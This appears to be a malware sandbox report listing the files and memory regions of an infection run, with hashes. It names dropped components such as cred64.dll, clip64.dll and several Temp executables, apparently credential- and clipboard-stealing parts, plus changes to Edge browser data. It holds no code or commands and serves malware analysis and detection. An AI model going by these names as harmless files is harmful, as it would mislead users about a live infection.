SHA512 c28d7b702b6a089f90bd84b50fde3de299d0c5ec843d6e06da9f7ee1ddfbcf04f6d05b5cb21bd098196417cd96b379e26e7506c412952c43d827118c6f99bfec

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58b61c.TMP

MD5 bcc3fa35cec30b290c9ba7a62e4c63fc
SHA1 23248121c97214f9dabc8e977ce084b881c4a338
SHA256 40e0134cc3904fc279473939721513dbf4d0921cf7484d8226ce7cc81ec98473
SHA512 7d469d3c02f1b66d436a9ff24b64c803be0e9ba7ab34261460373aa541b650972ed72959c47a0ffd86fa403b08fbf3e8001f03d23e23ccfac46622fe271351e5

memory/5564-425-0x00000000071F0000-0x0000000007200000-memory.dmp

memory/5736-426-0x0000000008110000-0x0000000008176000-memory.dmp

memory/5340-436-0x0000000074890000-0x0000000075040000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

memory/5736-453-0x0000000008A20000-0x0000000008A70000-memory.dmp

memory/5736-454-0x0000000008A80000-0x0000000008AF6000-memory.dmp

memory/5736-455-0x0000000008DD0000-0x0000000008F92000-memory.dmp

memory/5736-456-0x0000000008FA0000-0x00000000094CC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 bf4e15927d748e7fea6b6f7d68958d72
SHA1 d8e89f83c0ed5c98f731f57b8d9e107ef52747a4
SHA256 a0defc69f3c318c2ad427239899ec26b00d6a6fd7035208313950242f906a387
SHA512 b440dcda4aaf22b95382e2e518461a4314cc27ca4ef82551574d2d9d0deac4d46383108d5c52cba7f0673074ed6a43fd0ea85e6d242c92707a1b035cab5eede5

memory/5736-466-0x0000000009550000-0x000000000956E000-memory.dmp

memory/5736-468-0x0000000000400000-0x000000000047E000-memory.dmp

memory/5736-469-0x0000000074890000-0x0000000075040000-memory.dmp

memory/5736-472-0x0000000074890000-0x0000000075040000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 8f4b3f474908a90425ac90dba527234d
SHA1 1599f8bccb157e97c8e683cdec065cddabcf2e39
SHA256 a13736908409cf629f99b7b154906a2a222cd66513b9f91d2824da244da6af60
SHA512 dcd558063d6c76b350a4411c2acc17802d6e2bc482b6f80d59c2c0a45ced96688fbebd7c124e6e9982d9516ac7bd415e7e413c1e6c6f5baf17ca0659df8311b2

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 c7e6c262c80af683f6582e99d116ae93
SHA1 f8e1ae648c03cb6f56974df87ce465242b4b61b4
SHA256 a7b2293f8e4d3a7912309ff6c69b98d328ef03f534722a3bbddaa78e32237495
SHA512 69847abbccc41bf4fe547b08027c277dea285f3716ee8c263c104e94a54626d78d62007a21314e893b0b9dd50c93102e3f9c76d26ab140753d59c48014d9818e

memory/5876-600-0x0000000074890000-0x0000000075040000-memory.dmp

memory/5876-603-0x00000000003C0000-0x00000000014F8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6a085a5ce478080d06a5035eaee7d97c
SHA1 75e774ca09a447b2836a14c9fe5e4d88a4ac37cb
SHA256 4d8d88228d68177f05233f9355fa8b25cee3a9bbcc96b47eeb9f12ec5c828457
SHA512 308d05358754432778f38a00097f2f2b0c085a9eabfe9621d36d46c41b76d54a5c3d54b0c3f194b1ce970d74c8138cad6d7ee57236a5e9ba1b055bbce670b366

memory/6096-611-0x0000000000400000-0x000000000047E000-memory.dmp

memory/6096-613-0x0000000000590000-0x00000000005EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 498af485852079b7064dd1675377809f
SHA1 a6a36a996b5f1d2dab2eb4232f65275cb1df4030
SHA256 e56a79a9de6b1e161d5cb6969bd056062565f2525800b38f205bd41eb45bd0f6
SHA512 04c5e5cebf49162b6947172d1409ba8e419e39260aed3832b39e1846b9fd2dcb06590983f2b067f5601b8006bf79d7973df47d2776de5f33621ddc945f98e344

memory/6096-623-0x0000000074890000-0x0000000075040000-memory.dmp

memory/324-624-0x0000000000580000-0x0000000000589000-memory.dmp

memory/324-626-0x0000000000760000-0x0000000000860000-memory.dmp

memory/6096-627-0x0000000007700000-0x0000000007710000-memory.dmp

memory/2664-632-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2664-638-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cac360e5fb18e8f135b7008cb478e15a
SHA1 37e4f9b25237b12ab283fc70bf89242ab3b83875
SHA256 e8689f69dd3d0a3bd5f6e4b3a85251583c4b3b1dbf03e0c30c6cf0048e6532f8
SHA512 7f0bd6103dd802de4a4665b460c8c178f32e6075094532ec43c83fc1d8595d9495772bf191669f4b72cc2d78f91b06e046a11bbd0ef935b040eeb31e741d2a32

memory/1208-646-0x0000000074890000-0x0000000075040000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\kos4.exe

MD5 01707599b37b1216e43e84ae1f0d8c03
SHA1 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2
SHA256 cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd
SHA512 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642

memory/1208-643-0x0000000000770000-0x0000000000B50000-memory.dmp

memory/1208-656-0x00000000053C0000-0x000000000545C000-memory.dmp

memory/5208-659-0x0000000002990000-0x0000000002D8F000-memory.dmp

memory/1956-660-0x00000000008B0000-0x00000000008B8000-memory.dmp

memory/5876-661-0x0000000074890000-0x0000000075040000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 2b53473498240b0cfe086cbf35137028
SHA1 20ed16a35649f642c7ab159efd26eadb1238e8c5
SHA256 ed20a7a5c56ce31712dac823763df62ba30eb3e4f9976f0bd5ed1c8638fac5ae
SHA512 3c7009d1677cef8fadce076a38638a919a0815bb04bdcf3480ee2916a30630606cff3d549a586d5f10b651af9f15303e858255c2479cd6fa725406decd14ea06

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/1956-681-0x00007FFBF8E20000-0x00007FFBF98E1000-memory.dmp

memory/5208-682-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1956-684-0x000000001B630000-0x000000001B640000-memory.dmp

memory/5876-683-0x0000000074890000-0x0000000075040000-memory.dmp

memory/5208-685-0x0000000002E90000-0x000000000377B000-memory.dmp

memory/6096-688-0x0000000000400000-0x000000000047E000-memory.dmp

memory/3280-690-0x00000000088E0000-0x00000000088F6000-memory.dmp

memory/2664-691-0x0000000000400000-0x0000000000409000-memory.dmp

memory/6096-689-0x0000000074890000-0x0000000075040000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 11c7e3f85e6511a2310a99d13e4ed50d
SHA1 cf0e5d1a3d6589dd1c5a6e947e669007c8584e7f
SHA256 1854806620227e682b93a98d43c9c93fd4b27a0b960ab1f6264db20dad7e4596
SHA512 d8281c561404b83b7cfcdee368945b616c67038c51f2f92e9cde613b0b6c4fff1d8b5a52ef933a6bad8d479e16c4e52d01c344e96f7834e3bb389eea7982df54

memory/6132-704-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1956-708-0x00007FFBF8E20000-0x00007FFBF98E1000-memory.dmp

memory/3544-722-0x0000000000550000-0x0000000000551000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 e938acc2835f78cd2417a22cfd06e68c
SHA1 aa295374a760fdcded8cc53890a39ad6792af481
SHA256 cf0112ca764a8ada95c5102f6503ccf1201eda64432c071d58779481232d69c0
SHA512 2b7a5a107f62c612bfea103f65d280312dc9faf123f4347dddd0595f82ec5bf6285b607fc06f1485fb5817d61d8f27b45683c6cfc0c0c35058ddbeb14eff3fb6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2dc682d8155d4ccf2e1295cb949b1500
SHA1 2546c26d5eb58ba417eb176f393a0650a6eb2497
SHA256 30f93c5f41b5daac97e331168393dd5425342194ddd91407ad32b13e1a518e96
SHA512 310eb2c9a3a22a219435a827db34bce16bf1b630a7e6905aeaa7c98f95efc21c17711cedea1551bb9b0903b772bd75b0ade2c7ae936ecdda15519dc01e0959a0

memory/5208-775-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1208-793-0x0000000074890000-0x0000000075040000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 fc30082742082568e5f7a239da3ef700
SHA1 588beec4965df7f052848c771cdcab8e2d3efcbc
SHA256 51954511ec4a81aba306073b862b0672eced0121dba58e35ccdc2cc598623179
SHA512 6a041ddb7a9006756ff3b815be8c4e19aaf8f4d6b1dfdb84c408a98ebf877a642c92b13541fb69b0df66fe75e61c55facd9416896e545ce84af1813f047bc830

memory/5188-804-0x0000000000400000-0x0000000000636000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 316ef47999dfa60764bcae41544412fa
SHA1 e159428b8c6b7f1781a6c7f958cac95c871310c2
SHA256 c2868ad99312bbbe84dafdff8dcd2a57202ab7ec9b92d9842155bb3ee47b2b08
SHA512 2417fd4745044ceceaf4f27098b13d0e77ea3be320bbb90743157ad77386e6ad1edd53e01217debd9a5fe0700dbe087964f97711120a9b812728a266688c8d35

memory/5188-813-0x0000000000400000-0x0000000000636000-memory.dmp

memory/5744-827-0x0000000000400000-0x000000000041B000-memory.dmp

memory/5744-833-0x0000000000400000-0x000000000041B000-memory.dmp

memory/5744-835-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 390b91d90ac55b5f252fda9e5f21516e
SHA1 dff7c4475c7353ea05947f72c66eacc449bdb43f
SHA256 e8bb5eda2a113442957fa24b9541ae1824b13a335395abd94bdeb5d7d8620bd0
SHA512 3fac00c46e58da309838f785232bb0c6fc104e127741579b0b2c877a31cd23310e8256523fd79b9288ee82b91f0197c1b4db109633662ae2b75d86e6f899163b

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r1cmnfcv.s03.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5476-862-0x0000000010000000-0x000000001057B000-memory.dmp

memory/5208-866-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 328ee31b165595662abc64b159d27b28
SHA1 1940a93a49af027f63e4d27f214ed87f6dc6ccfe
SHA256 c3f1d1bbb88c86a8dd125c96fdf2898d915c1db4e6bb7a29b786609ebb857dd9
SHA512 8553208cad50a9bede2498cd7919be5401dcb5444301a706f518f6d6874c6fdea5a4c9ad7c6e920cacd83b347ae5f57f61b25773f14d55b03127147a41d4c565

memory/5208-954-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 8c1c6f6e444448ec2e9b94b685efc009
SHA1 d217cc31841cffe3a23577f3f9e8a6f4f160fdfa
SHA256 1567dbceccdcedf09437b6c7add49c8d8bec8d0714336c81749314864893b31c
SHA512 f7e4f6ec2d9b8d606b36eb66065dfc0233bc1627c932d394e879b9e823008f62e29b72e8009d246360928b073947c4ceebd2dc4a892186214873434fd9072d38

memory/4936-987-0x00007FF709D60000-0x00007FF70A301000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 f9ab57047007b5a737d910688d40cefa
SHA1 70e42aeb82d0796a874ec49a6e2fec9fcdf6fe90
SHA256 90fc4ebb2132b0501a2e9b762ceeca86824dcf2ef0daa64527ea90ac0d498231
SHA512 b7afbaa031edd3fd060e04beb22041ba17f3aa9debbe947685eeba95fa7122f8dfcf39b150188419f6eb7c028313aaa78e19a04710d2eeeeb7ddb08b5688eca4

memory/5208-1033-0x0000000000400000-0x0000000000D1B000-memory.dmp